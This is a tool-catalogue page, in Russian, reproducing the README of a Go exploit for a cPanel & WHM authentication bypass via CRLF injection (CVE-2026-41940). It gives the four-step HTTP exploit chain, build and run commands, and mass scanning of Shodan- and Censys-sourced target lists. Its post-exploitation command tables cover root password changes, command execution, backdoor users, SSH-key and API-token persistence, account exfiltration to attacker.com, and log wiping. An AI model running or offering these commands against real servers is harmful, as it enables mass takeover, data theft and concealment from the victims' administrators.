Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-41940-Exploit-PoC — Эксплойт PoC для CVE-2026-41940 — обход аутентификации cPanel & WHM через CRLF-инъекцию. Включает массовое сканирование, действия после эксплуатации и интерактивную оболочку для авторизованного тестирования. | Kitploit
Инструменты/GitHubGitHub/ishanoshada/cve-2026-41940-exploit-poc
Аутентификация и авторизацияСканеры уязвимостейЭксплуатацияЭксплуатация веб-приложенийПост-эксплуатацияТестирование на ПроникновениеRed TeamingРазработка Полезной Нагрузки

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHub
ishanoshada/cve-2026-41940-exploit-poc

CVE-2026-41940-Exploit-PoC

Эксплойт PoC для CVE-2026-41940 — обход аутентификации cPanel & WHM через CRLF-инъекцию. Включает массовое сканирование, действия после эксплуатации и интерактивную оболочку для авторизованного тестирования.

РепозиторийСайт
21144 месяцев назадЕщё не проверено

CVE-2026-41940 Exploit PoC – Обход аутентификации cPanel & WHM

CVE-2026-41940 CVSS Go Version License

Автор инструмента: Ishan Oshada | GitHub

⚠️ ТОЛЬКО ДЛЯ АВТОРИЗОВАННОГО ТЕСТИРОВАНИЯ БЕЗОПАСНОСТИ. Несанкционированное использование незаконно.

1


📋 Содержание

  • Обзор уязвимости
  • Цепочка эксплуатации
  • Возможности
  • Установка
  • Быстрый старт
  • Примеры использования (таблица)
  • Действия после эксплуатации
  • Команды интерактивной оболочки
  • Массовое сканирование с urls.txt
  • Примеры вывода
  • Справочник параметров
  • Затронутые версии
  • Сборка для всех платформ
  • FAQ и устранение неполадок
  • Отказ от ответственности
  • Автор

2

Обзор уязвимости

CVE-2026-41940 — это уязвимость CRLF-инъекции в cPanel & WHM (версии < 11.110.0.97, 11.118.0.63, 11.126.0.54, 11.132.0.29, 11.134.0.20, 11.136.0.5).

Функция saveSession() записывает данные сессии после применения filter_sessiondata(), но фильтр применяется слишком поздно. Внедряя CRLF-символы (\r\n) в заголовок Authorization: Basic, злоумышленник может отравить файл сессии на диске произвольными парами ключ-значение (например, hasroot=1, tfa_verified=1, user=root).

Когда отравленная сессия позже загружается, cPanel/WHM предоставляет полный root-доступ без какого-либо пароля.

Оценка CVSS: 10.0 (КРИТИЧЕСКАЯ)

  • Вектор атаки: Сеть
  • Сложность атаки: Низкая
  • Требуемые привилегии: Отсутствуют
  • Взаимодействие с пользователем: Отсутствует
  • Конфиденциальность: Высокая
  • Целостность: Высокая
  • Доступность: Высокая

Цепочка эксплуатации (4 этапа)


Возможности

  • ✅ Одиночное и массовое сканирование (ввод из файла, конвейер stdin)
  • ✅ Многопоточное сканирование (управление параллелизмом до 100+ потоков)
  • ✅ Подробный режим (--verbose) — показывает полные HTTP-запросы/ответы
  • ✅ JSON-вывод (автосохранение при обнаружении уязвимой цели)
  • ✅ 10 действий после эксплуатации (см. таблицу ниже)
  • ✅ Кроссплатформенность (Windows, Linux, macOS)
  • ✅ Без внешних зависимостей (только стандартная библиотека Go)
  • ✅ Цветной вывод в терминале с чёткими рамками результатов
  • ✅ Постоянство сессии — механизм keep-alive
  • ✅ Интерактивная WHM-оболочка с историей команд

Установка

Предварительные требования

  • Go 1.20 или выше (Скачать)

Клонирование репозитория

root@kitploit:~
git clone https://github.com/ishanoshada/CVE-2026-41940-Exploit-PoC.git
cd CVE-2026-41940-Exploit-PoC

Сборка исполняемого файла

Windows

root@kitploit:~
go build -o cpanel_sniper.exe main.go

Linux / macOS

root@kitploit:~
go build -o cpanel_sniper main.go
chmod +x cpanel_sniper

Запуск напрямую (без сборки)

root@kitploit:~
go run main.go -u https://target.com:2087

Готовые бинарные файлы (самый быстрый способ)

Вместо сборки из исходников вы можете скачать последние стабильные исполняемые файлы прямо из репозитория. Они автоматически генерируются для каждого обновления:

Примечание: При использовании Linux или macOS не забудьте предоставить права на выполнение после загрузки:


Быстрый старт

root@kitploit:~
# Базовое сканирование
go run main.go -u https://target.com:2087

# Список всех cPanel-аккаунтов
go run main.go -u https://target.com:2087 -action list

# Интерактивная WHM-оболочка
go run main.go -u https://target.com:2087 -action shell

# Массовое сканирование с urls.txt
go run main.go -l urls.txt -t 20 -o results.json

Примеры использования (таблица)


Действия после эксплуатации


Команды интерактивной оболочки

Попав в оболочку (-action shell), используйте следующие команды:


Массовое сканирование с urls.txt

Репозиторий включает urls.txt с 1000 примеров целей для массового сканирования.

Формат urls.txt

root@kitploit:~
https://192.168.1.1:2087
https://192.168.1.2:2087
https://example1.com:2087
https://example2.com:2087
...

Команды массового сканирования

root@kitploit:~
# Базовое массовое сканирование (10 потоков)
go run main.go -l urls.txt

# Быстрое массовое сканирование (50 потоков, сохранение результатов)
go run main.go -l urls.txt -t 50 -o results.json

# Массовое сканирование с действием после эксплуатации
go run main.go -l urls.txt -t 20 -action list -o hacked_servers.json

# Массовое сканирование с подробным выводом
go run main.go -l urls.txt -t 10 --verbose

# Массовое сканирование с увеличенным таймаутом (медленные сети)
go run main.go -l urls.txt -t 30 -timeout 30

Создание urls.txt самостоятельно

root@kitploit:~
# Генерация диапазона IP (Linux/macOS)
for i in {1..254}; do echo "https://192.168.1.$i:2087"; done > urls.txt

# Генерация диапазона IP (Windows PowerShell)
1..254 | ForEach-Object { "https://192.168.1.$($_):2087" } > urls.txt

# Из Shodan
shodan search --fields ip_str,port 'title:"WHM Login"' | awk '{print "https://"$1":"$2}' > urls.txt

# Из Censys
censys search 'services.port=2087' | awk '{print "https://"$1":2087"}' > urls.txt

Примеры вывода

Обнаружена уязвимая цель

root@kitploit:~
╔════════════════════════════════════════════════════════════════╗
║                    ОБНАРУЖЕНА УЯЗВИМАЯ ЦЕЛЬ                    ║
╠════════════════════════════════════════════════════════════════╣
║ Цель: https://target.example.com:2087                          ║
║ Токен: /cpsess1234567890                                       ║
║ Версия: 11.76.0.22                                             ║
║ Сессия: :od2aMhg5zJeQunUy...                                   ║
║ API URL: https://target.example.com:2087/cpsess1234567890/json-api/version ║
╚════════════════════════════════════════════════════════════════╝

[+] Действие: LIST
    • Пользователь: admin | Домен: example.com
    • Пользователь: backup | Домен: backup.example.com
    • Пользователь: client1 | Домен: client1.com

Сводный вывод

root@kitploit:~
════════════════════════════════════════════════════════════════════
                    СВОДКА ЗАВЕРШЁННОГО СКАНИРОВАНИЯ
════════════════════════════════════════════════════════════════════
  Всего просканировано целей: 1000
  Уязвимых целей: 47
  Затраченное время: 125.34 секунд

УЯЗВИМЫЕ ЦЕЛИ:
────────────────────────────────────────────────────────────────
  1. https://192.168.1.15:2087
      Токен: /cpsess1111111111
      Версия: 11.76.0.22
      Сессия: :od2aMhg5zJeQunUy...
  2. https://192.168.1.42:2087
      Токен: /cpsess2222222222
      Версия: 11.86.0.15
      Сессия: Km2psnYR9w3rRkLU...
  3. https://example.com:2087
      Токен: /cpsess3333333333
      Версия: 11.118.0.42
      Сессия: Xk9mQrNtPw3sVbLm...

════════════════════════════════════════════════════════════════════

[✓] Результаты сохранены в: results.json

Справочник параметров


Затронутые версии


Сборка для всех платформ

Windows

root@kitploit:~
go build -o cpanel_sniper.exe main.go
cpanel_sniper.exe -u https://target.com:2087

Linux

root@kitploit:~
go build -o cpanel_sniper main.go
chmod +x cpanel_sniper
./cpanel_sniper -u https://target.com:2087

macOS (Intel)

root@kitploit:~
GOOS=darwin GOARCH=amd64 go build -o cpanel_sniper_mac_intel main.go

macOS (Apple Silicon M1/M2/M3)

root@kitploit:~
GOOS=darwin GOARCH=arm64 go build -o cpanel_sniper_mac_m1 main.go

Кросс-компиляция для всех платформ

root@kitploit:~
# Windows
GOOS=windows GOARCH=amd64 go build -o cpanel_sniper_windows.exe main.go

# Linux
GOOS=linux GOARCH=amd64 go build -o cpanel_sniper_linux main.go

# macOS Intel
GOOS=darwin GOARCH=amd64 go build -o cpanel_sniper_mac_intel main.go

# macOS M1/M2
GOOS=darwin GOARCH=arm64 go build -o cpanel_sniper_mac_m1 main.go

# Linux ARM (Raspberry Pi)
GOOS=linux GOARCH=arm64 go build -o cpanel_sniper_linux_arm64 main.go

Структура каталога

root@kitploit:~
CVE-2026-41940-Exploit-PoC/
├── README.md           # Документация
├── bin/                # Готовые многоплатформенные исполняемые файлы 
│   ├── windows_x64/
│   ├── linux_x64/
│   └── ...
├── main.go             # Основной исходный код
├── urls.txt            # 1000 примеров целей
├── go.mod              # Файл модуля Go
├── .gitignore          # Файл игнорирования Git
└── results.json        # Выходной файл (генерируется)

Отказ от ответственности

Этот инструмент предназначен только для образовательных целей и авторизованного тестирования на проникновение.

Несанкционированный доступ к компьютерным системам незаконен в соответствии с:

  • Законом о компьютерном мошенничестве и злоупотреблениях (CFAA) — США
  • Законом о неправомерном использовании компьютеров — Великобритания
  • Законом об информационных технологиях — Индия
  • Аналогичными законами по всему миру

Автор не несёт ответственности за неправомерное использование. Используйте на свой страх и риск.

Используя этот инструмент, вы соглашаетесь с тем, что имеете надлежащее разрешение на тестирование целевых систем.


Автор

Ishan Oshada

  • 🔗 Веб-сайт: ishanoshada.com
  • 🐙 GitHub: github.com/ishanoshada
  • 📧 Эл. почта: [email protected]

Views

Поддержка

Если вы считаете этот инструмент полезным:

  • ⭐ Поставьте звезду репозиторию на GitHub
  • 🔄 Поделитесь с сообществом специалистов по безопасности
  • 📝 Сообщайте о проблемах через GitHub Issues

Удачного взлома! 🚀

Помните: С большой силой приходит большая ответственность. Используйте этично.

Скачать инструмент
ЭтапДействиеОписание
1POST /login/?login_only=1Запрос pre-auth cookie сессии с неверными учётными данными
2GET / + CRLF-заголовок AuthorizationОтравление файла сессии значениями hasroot=1, user=root и т.д.
3GET /scripts2/listacctsПринудительная перезагрузка кэша сессии из отравленного файла (распространение)
4GET /cpsess<TOKEN>/json-api/versionПроверка root-доступа — успех = 200 + данные версии
ПлатформаРасположение
Windows (x64)/bin/windows_x64/cpanel_sniper.exe
Linux (x64)/bin/linux_x64/cpanel_sniper
Linux (ARM64)/bin/linux_arm64/cpanel_sniper
macOS (Intel)/bin/mac_intel/cpanel_sniper
macOS (M1/M2/M3)/bin/mac_m1_m2/cpanel_sniper
#НазначениеКоманда
1Базовое сканирование одной целиgo run main.go -u https://target.com:2087
2Список всех cPanel-аккаунтовgo run main.go -u https://target.com:2087 -action list
3Смена root-пароляgo run main.go -u https://target.com:2087 -action passwd -passwd "NewP@ssw0rd!2006"
4Выполнение системной командыgo run main.go -u https://target.com:2087 -action cmd -cmd "id && whoami"
5Получение информации о сервереgo run main.go -u https://target.com:2087 -action info
6Создание пользователя-бэкдораgo run main.go -u https://target.com:2087 -action adduser -new-user backdoor -new-domain backdoor.com -passwd "Pass123!2006"
7Создание API-токена (скрытно)go run main.go -u https://target.com:2087 -action apitoken -tokenname mytoken
8Внедрение SSH-ключаgo run main.go -u https://target.com:2087 -action sshkey -sshkey "ssh-rsa AAAAB3NzaC1yc2E..."
9Дамп и эксфильтрация аккаунтаgo run main.go -u https://target.com:2087 -action dumpacct -dumpuser victim -exfil https://attacker.com/upload
10Очистка логов и заметание следовgo run main.go -u https://target.com:2087 -action wipe
11Интерактивная WHM-оболочкаgo run main.go -u https://target.com:2087 -action shell
12Массовое сканирование из файлаgo run main.go -l urls.txt -t 20 -o results.json
13Сохранение результатов в JSONgo run main.go -u https://target.com:2087 -o scan_results.json
14Включение подробной отладкиgo run main.go -u https://target.com:2087 --verbose
15Конвейер из других инструментовcat urls.txt | go run main.go -t 20
16Увеличение таймаутаgo run main.go -u https://target.com:2087 -timeout 30
ДействиеФлагОписаниеУровень скрытности
list-action listСписок всех cPanel-аккаунтовНизкий
passwd-action passwd -passwd NEWPASSСмена root-пароля (шумно)Высокий (обнаруживаемо)
cmd-action cmd -cmd "id"Выполнение команд ОССредний
info-action infoПоказать hostname, нагрузку, версиюНизкий
adduser-action adduser -new-user U -new-domain DСоздание cPanel-пользователя-бэкдораСредний
apitoken-action apitoken [-tokenname NAME]Генерация постоянного API-токенаОчень низкий
sshkey-action sshkey -sshkey "ssh-rsa..."Внедрение SSH-ключа в rootОчень низкий
dumpacct-action dumpacct -dumpuser USER -exfil URLРезервное копирование и эксфильтрация аккаунтаСредний
wipe-action wipeОтключение WAF, очистка логов, стирание историиЗаметание следов
shell-action shellИнтерактивная WHM-оболочкаНизкий
КомандаОписаниеПример
accountsСписок всех cPanel-аккаунтовaccounts
passwd <pass>Смена root-пароляpasswd MyNewPass123!2006
exec <command>Выполнение системной командыexec "cat /etc/passwd"
infoПоказать информацию о сервереinfo
versionПоказать версию cPanelversion
helpПоказать доступные командыhelp
exitВыход из оболочкиexit
ПараметрТипПо умолчаниюОписание
-ustring-URL цели (например, https://example.com:2087)
-lstring-Файл с целями (по одной в строке)
-tint10Количество параллельных потоков
-actionstring-Действие после эксплуатации
-passwdstring-Новый пароль (для passwd/adduser)
-cmdstring-Команда для выполнения (для действия cmd)
-new-userstring-Имя пользователя для действия adduser
-new-domainstring-Домен для действия adduser
-tokennamestring-Имя API-токена (действие apitoken)
-sshkeystring-Публичный SSH-ключ для внедрения (действие sshkey)
-dumpuserstring-Имя пользователя для резервного копирования (действие dumpacct)
-exfilstring-Удалённый URL для эксфильтрации (действие dumpacct)
-ostring-Выходной JSON-файл (автосохранение при обнаружении)
--verboseboolfalseПоказывать HTTP-запросы/ответы
-hboolfalseПоказать меню справки
ВеткаИсправленная версияУязвимые <
11.11011.110.0.9711.110.0.96
11.11811.118.0.6311.118.0.62
11.12611.126.0.5411.126.0.53
11.13211.132.0.2911.132.0.28
11.13411.134.0.2011.134.0.19
11.13611.136.0.511.136.0.4